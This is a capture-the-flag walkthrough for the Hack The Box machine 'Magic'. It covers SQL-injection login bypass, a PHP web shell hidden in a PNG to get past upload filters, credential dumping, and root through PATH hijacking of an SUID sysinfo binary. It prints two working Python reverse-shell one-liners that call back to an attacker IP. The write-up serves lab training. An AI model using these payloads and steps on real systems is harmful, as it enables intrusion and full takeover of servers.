Magic
Last updated
Was this helpful?
Last updated
Was this helpful?
Magic box is a web server which we will be using SQL injection to bypass login screen and upload a php shell with modified magic byte to bypass upload filter. With basic access we then will find a database file that contained hardcoded database credentials. We will then dump the database to get username and password of admin which we can use to privilege escalate and get user flag.
In order to get root, we find a sysinfo with SUID bit which we will use to run a malicious fdisk file and executing a reverse shell via python getting us root access.
Use nmap to scan Magic host for all ports using:
-sC to scan with default scripts.
-sV to scan for
-p0-65536 to scan for all ports (using -p- misses port 0 which MAY be used in rare chances)
We see port 80 is open so we lets recon the site: http://10.10.10.185
Homepage contains picture gallery with id tags. We also see a link to a Login page: http://10.10.10.185/login.php
Since the site states “Please Login, to upload images”, lets note that we may need to use a upload a file to get initial foothold
Using Burp Proxy, lets send a POST request with following paremeters to the login page:
Username/Password: admin/password
Lets modify the input to contain a MySQL payload to bypass the login screen:
We are routed to an upload page. If you click Upload Image, it will tell you that it only accepts jpg, jpeg, and png.
NOTE: You will need a image. Replace “test” with the name of your file. I use my dgb1.png
Lets modify a png with exiftool and add a php shell with a cmd parameter:
To bypass the file type filter lets make this a .php.png so it opens as a php:
Upload the file.
Call the php shell by adding a parameter value to our hidden php file:
Now that we know we have shell execution, lets open a netcat session:
Use following url to create a system shell back to your machine. Please use your IP instead of the IP below:
http://10.10.10.185/images/uploads/test.php.png?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.209",7777)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Now that you have system shell on your terminal within netcat listener, use following command to get a bash shell:
Within Webserver directory we find a interesting database file:
The file included hard-coded username and password of database, lets use this to dump the database:
Now that we got the admin username and password, lets escalate to theseus’s shell:
Lets route to theseus’s home directory and get the user flag:
We will use sysinfo/fdisk exploit to create a root bash shell.
Within your machine lets create a fdisk file:
Add the following on fdisk:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.209",7778));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Create a python webserver in current directory:
Within Magic bash shell, route to tmp directory:
Use wget to pull our fdisk file:
Lets add tmp directory to PATH and change priveleges to fdisk:
Open a netcat on your machine:
Use sysinfo command on magic machine:
Ones you get a system bash, run python command below to get bash shell:
You now have root! Route to root directory to get the root flag:
That’s it!
An alternative way to get the database username and password is using sqlmap.
